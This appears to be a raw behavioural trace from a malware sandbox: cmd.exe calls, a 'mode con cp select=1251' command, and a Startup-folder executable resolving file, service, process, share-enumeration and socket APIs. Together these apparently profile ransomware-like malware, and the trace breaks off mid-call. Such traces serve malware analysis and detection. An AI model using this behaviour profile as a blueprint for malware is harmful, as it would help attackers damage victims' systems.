_wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0069.620] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0069.620] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0069.620] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0069.620] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0069.620] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0069.620] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0069.620] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0069.620] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0069.620] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0069.620] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0069.620] _wcsicmp (_String1="mode", _String2="START") returned -6 [0069.620] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0069.620] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0069.620] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0069.620] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0069.620] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0069.620] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0069.620] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0069.620] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0069.620] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0069.620] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0069.620] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0069.620] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0069.620] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0069.621] ??_V@YAXPEAX@Z () returned 0x1 [0069.621] GetProcessHeap () returned 0x18f03d90000 [0069.621] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xffde) returned 0x18f03d98fe0 [0069.621] GetProcessHeap () returned 0x18f03d90000 [0069.621] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x42) returned 0x18f03d983e0 [0069.621] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0069.621] malloc (_Size=0xffce) returned 0x18f03ec0820 [0069.621] ??_V@YAXPEAX@Z () returned 0x18f03ec0820 [0069.622] GetProcessHeap () returned 0x18f03d90000 [0069.622] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x1ffac) returned 0x18f03da8fd0 [0069.623] SetErrorMode (uMode=0x0) returned 0x0 [0069.623] SetErrorMode (uMode=0x1) returned 0x0 [0069.623] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x18f03da8fe0, lpFilePart=0x62afcff2a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x62afcff2a0*="Desktop") returned 0x17 [0069.623] SetErrorMode (uMode=0x0) returned 0x1 [0069.623] GetProcessHeap () returned 0x18f03d90000 [0069.623] RtlReAllocateHeap (Heap=0x18f03d90000, Flags=0x0, Ptr=0x18f03da8fd0, Size=0x4a) returned 0x18f03da8fd0 [0069.623] GetProcessHeap () returned 0x18f03d90000 [0069.623] RtlSizeHeap (HeapHandle=0x18f03d90000, Flags=0x0, MemoryPointer=0x18f03da8fd0) returned 0x4a [0069.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0069.623] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.623] GetProcessHeap () returned 0x18f03d90000 [0069.623] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x1bc) returned 0x18f03d96c30 [0069.623] GetProcessHeap () returned 0x18f03d90000 [0069.623] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x368) returned 0x18f03da9030 [0069.633] GetProcessHeap () returned 0x18f03d90000 [0069.633] RtlReAllocateHeap (Heap=0x18f03d90000, Flags=0x0, Ptr=0x18f03da9030, Size=0x1be) returned 0x18f03da9030 [0069.633] GetProcessHeap () returned 0x18f03d90000 [0069.633] RtlSizeHeap (HeapHandle=0x18f03d90000, Flags=0x0, MemoryPointer=0x18f03da9030) returned 0x1be [0069.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.633] GetProcessHeap () returned 0x18f03d90000 [0069.633] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xe8) returned 0x18f03d96e00 [0069.635] GetProcessHeap () returned 0x18f03d90000 [0069.635] RtlReAllocateHeap (Heap=0x18f03d90000, Flags=0x0, Ptr=0x18f03d96e00, Size=0x7e) returned 0x18f03d96e00 [0069.635] GetProcessHeap () returned 0x18f03d90000 [0069.635] RtlSizeHeap (HeapHandle=0x18f03d90000, Flags=0x0, MemoryPointer=0x18f03d96e00) returned 0x7e [0069.635] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.635] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x62afcff010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x62afcff010) returned 0xffffffffffffffff [0069.636] GetLastError () returned 0x2 [0069.636] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.636] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x62afcff010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x62afcff010) returned 0xffffffffffffffff [0069.639] GetLastError () returned 0x2 [0069.639] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.639] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x62afcff010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x62afcff010) returned 0x18f03d96e90 [0069.639] GetProcessHeap () returned 0x18f03d90000 [0069.639] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x0, Size=0x28) returned 0x18f03d91890 [0069.639] FindClose (in: hFindFile=0x18f03d96e90 | out: hFindFile=0x18f03d96e90) returned 1 [0069.639] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x62afcff010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x62afcff010) returned 0x18f03d96e90 [0069.639] GetProcessHeap () returned 0x18f03d90000 [0069.639] RtlReAllocateHeap (Heap=0x18f03d90000, Flags=0x0, Ptr=0x18f03d91890, Size=0x8) returned 0x18f03d91890 [0069.639] FindClose (in: hFindFile=0x18f03d96e90 | out: hFindFile=0x18f03d96e90) returned 1 [0069.639] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0069.639] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0069.639] ??_V@YAXPEAX@Z () returned 0x1 [0069.639] GetConsoleTitleW (in: lpConsoleTitle=0x62afcff590, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0070.663] GetProcessHeap () returned 0x18f03d90000 [0070.663] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x21c) returned 0x18f03da9200 [0070.663] GetConsoleTitleW (in: lpConsoleTitle=0x18f03da9210, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0070.895] GetProcessHeap () returned 0x18f03d90000 [0070.895] RtlReAllocateHeap (Heap=0x18f03d90000, Flags=0x0, Ptr=0x18f03da9200, Size=0xaa) returned 0x18f03da9200 [0070.895] GetProcessHeap () returned 0x18f03d90000 [0070.895] RtlSizeHeap (HeapHandle=0x18f03d90000, Flags=0x0, MemoryPointer=0x18f03da9200) returned 0xaa [0070.895] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0071.248] GetProcessHeap () returned 0x18f03d90000 [0071.248] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03da9200) returned 1 [0071.248] InitializeProcThreadAttributeList (in: lpAttributeList=0x62afcff4b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x62afcff3a0 | out: lpAttributeList=0x62afcff4b0, lpSize=0x62afcff3a0) returned 1 [0071.248] UpdateProcThreadAttribute (in: lpAttributeList=0x62afcff4b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x62afcff38c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x62afcff4b0, lpPreviousValue=0x0) returned 1 [0071.249] GetStartupInfoW (in: lpStartupInfo=0x62afcff440 | out: lpStartupInfo=0x62afcff440*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0071.249] GetProcessHeap () returned 0x18f03d90000 [0071.249] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x20) returned 0x18f03d96e90 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.249] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0071.250] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0071.250] GetProcessHeap () returned 0x18f03d90000 [0071.250] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d96e90) returned 1 [0071.250] GetProcessHeap () returned 0x18f03d90000 [0071.250] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x12) returned 0x18f03d96e90 [0071.250] _get_osfhandle (_FileHandle=1) returned 0x254 [0071.250] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0071.250] _get_osfhandle (_FileHandle=0) returned 0x248 [0071.250] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0071.250] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x62afcff3d0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x62afcff3a8 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x62afcff3a8*(hProcess=0x98, hThread=0x94, dwProcessId=0x83c, dwThreadId=0xa70)) returned 1 [0071.400] CloseHandle (hObject=0x94) returned 1 [0071.400] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0071.400] GetProcessHeap () returned 0x18f03d90000 [0071.400] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d98500) returned 1 [0071.400] GetEnvironmentStringsW () returned 0x18f03d984c0* [0071.400] GetProcessHeap () returned 0x18f03d90000 [0071.400] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xacc) returned 0x18f03da9520 [0071.400] FreeEnvironmentStringsA (penv="=") returned 1 [0071.401] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff931f40000 [0071.401] GetProcAddress (hModule=0x7ff931f40000, lpProcName="NtQueryInformationProcess") returned 0x7ff931fe56b0 [0071.401] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x62afcfe8a8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x62afcfe8a8, ReturnLength=0x0) returned 0x0 [0071.401] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0xdca6908000, lpBuffer=0x62afcfe8e0, nSize=0x7a0, lpNumberOfBytesRead=0x62afcfe8a0 | out: lpBuffer=0x62afcfe8e0*, lpNumberOfBytesRead=0x62afcfe8a0*=0x7a0) returned 1 [0071.401] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) Thread: id = 24 os_tid = 0x4d0 Thread: id = 28 os_tid = 0x2ac Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7ba64000" os_pid = "0x384" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf8c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 19 os_tid = 0x4d8 Thread: id = 20 os_tid = 0xcc4 Thread: id = 21 os_tid = 0xc58 Thread: id = 22 os_tid = 0x324 Thread: id = 23 os_tid = 0xef0 Process: id = "4" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0xbf2c000" os_pid = "0x83c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf8c" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0xa70 Thread: id = 26 os_tid = 0xa80 Thread: id = 27 os_tid = 0xaec Process: id = "5" image_name = "hgaibc.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe" page_root = "0x3abd2000" os_pid = "0xe24" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0xe28 [0150.572] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77050000 [0150.572] GetProcAddress (hModule=0x77050000, lpProcName="GetProcAddress") returned 0x770651b0 [0150.572] GetProcAddress (hModule=0x77050000, lpProcName="GetModuleHandleW") returned 0x770650d0 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="FindNextFileW") returned 0x770bee40 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="FindClose") returned 0x770bed70 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="MoveFileW") returned 0x7709e500 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetFileSizeEx") returned 0x770bef40 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetModuleFileNameW") returned 0x77065090 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetFileAttributesW") returned 0x770bef10 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="ExitProcess") returned 0x77063cb0 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetCommandLineW") returned 0x77064cc0 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetComputerNameW") returned 0x770932c0 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetComputerNameA") returned 0x77093780 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="CreateMutexW") returned 0x770beb70 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="lstrlenW") returned 0x77066c70 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="lstrlenA") returned 0x77066c50 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetCurrentProcess") returned 0x770bea10 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="WaitForSingleObject") returned 0x770beca0 [0150.573] GetProcAddress (hModule=0x77050000, lpProcName="GetLogicalDrives") returned 0x77060d20 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="GetTickCount") returned 0x770bdd50 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="DeleteFileW") returned 0x770bed40 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="WideCharToMultiByte") returned 0x77066b10 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x770bebb0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="Sleep") returned 0x77066760 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="LeaveCriticalSection") returned 0x7789b250 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="ReadFile") returned 0x770bf090 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="CreateFileW") returned 0x770bed10 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="OpenMutexW") returned 0x770bebf0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="EnterCriticalSection") returned 0x7789b2d0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="WaitForMultipleObjects") returned 0x770bec80 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="lstrcmpiW") returned 0x77066bf0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="lstrcmpiA") returned 0x77066bd0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="DeleteCriticalSection") returned 0x7787fb90 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="ReleaseMutex") returned 0x770bec20 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="CloseHandle") returned 0x770beab0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="GetVersion") returned 0x770656c0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="CreateThread") returned 0x770646b0 [0150.574] GetProcAddress (hModule=0x77050000, lpProcName="ExpandEnvironmentStringsW") returned 0x77064a40 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="QueryPerformanceCounter") returned 0x77065da0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="QueryPerformanceFrequency") returned 0x77065dc0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="GetCurrentProcessId") returned 0x770bea20 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="SetFileAttributesW") returned 0x770bf100 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="GetVolumeInformationW") returned 0x770bf020 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="WriteFile") returned 0x770bf180 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="SetFilePointerEx") returned 0x770bf130 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="SetEndOfFile") returned 0x770bf0e0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="FindFirstFileW") returned 0x770bedf0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="GetProcessHeap") returned 0x770651f0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="HeapReAlloc") returned 0x7788f630 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="HeapAlloc") returned 0x77892dc0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="HeapFree") returned 0x770657f0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="CreatePipe") returned 0x77064590 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="SetHandleInformation") returned 0x770beae0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="CreateProcessW") returned 0x77064610 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="CompareStringW") returned 0x77064430 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="CompareStringA") returned 0x77064410 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="OpenProcess") returned 0x77065cc0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="TerminateProcess") returned 0x770667e0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="GetSystemTime") returned 0x770654e0 [0150.575] GetProcAddress (hModule=0x77050000, lpProcName="SystemTimeToFileTime") returned 0x770667a0 [0150.576] GetProcAddress (hModule=0x77050000, lpProcName="GetLastError") returned 0x77065010 [0150.576] GetProcAddress (hModule=0x77050000, lpProcName="CreateToolhelp32Snapshot") returned 0x7709edc0 [0150.576] GetProcAddress (hModule=0x77050000, lpProcName="Process32NextW") returned 0x7709f8f0 [0150.576] GetProcAddress (hModule=0x77050000, lpProcName="Process32FirstW") returned 0x7709f750 [0150.576] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x75b90000 [0151.135] GetProcAddress (hModule=0x75b90000, lpProcName="RegOpenKeyExW") returned 0x75bae580 [0151.135] GetProcAddress (hModule=0x75b90000, lpProcName="RegQueryValueExW") returned 0x75bae5a0 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="RegSetValueExW") returned 0x75baf530 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="RegCloseKey") returned 0x75baed60 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="OpenProcessToken") returned 0x75baefb0 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="GetTokenInformation") returned 0x75baee90 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="OpenSCManagerW") returned 0x75bb0540 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="OpenServiceW") returned 0x75bafa20 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="CloseServiceHandle") returned 0x75bafc00 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="ControlService") returned 0x75bc26d0 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="QueryServiceStatus") returned 0x75bb2380 [0151.136] GetProcAddress (hModule=0x75b90000, lpProcName="EnumDependentServicesW") returned 0x75bc2f70 [0151.137] GetProcAddress (hModule=0x75b90000, lpProcName="EnumServicesStatusExW") returned 0x75bafc80 [0151.137] LoadLibraryA (lpLibFileName="user32.dll") returned 0x774c0000 [0151.605] GetProcAddress (hModule=0x774c0000, lpProcName="SystemParametersInfoW") returned 0x774ef210 [0151.605] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x744f0000 [0152.770] GetProcAddress (hModule=0x744f0000, lpProcName="ShellExecuteExW") returned 0x74654730 [0152.770] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77850000 [0152.771] GetProcAddress (hModule=0x77850000, lpProcName="NtQuerySystemInformation") returned 0x778c2070 [0152.771] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74250000 [0152.784] GetProcAddress (hModule=0x74250000, lpProcName="WNetCloseEnum") returned 0x74252640 [0152.784] GetProcAddress (hModule=0x74250000, lpProcName="WNetOpenEnumW") returned 0x74252790 [0152.784] GetProcAddress (hModule=0x74250000, lpProcName="WNetEnumResourceW") returned 0x74252410 [0152.784] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f10000 [0152.794] GetProcAddress (hModule=0x76f10000, lpProcName="WSAStartup") returned 0x76f15b40 [0152.794] GetProcAddress (hModule=0x76f10000, lpProcName="socket") returned 0x76f24510 [0152.794] GetProcAddress (hModule=0x76f10000, lpProcName="send") returned 0x76f15030 [0152.794] GetProcAddress (hModule=0x76f10000, lpProcName="recv") returned 0x76f20c50 [0152.795] GetProcAddress (hModule=0x76f10000, lpProcName="connect") returned 0x76f15410 [0152.795] GetProcAddress (hModule=0x76f10000, lpProcName="closesocket") returned 0x76f20910 [0152.795] GetProcAddress 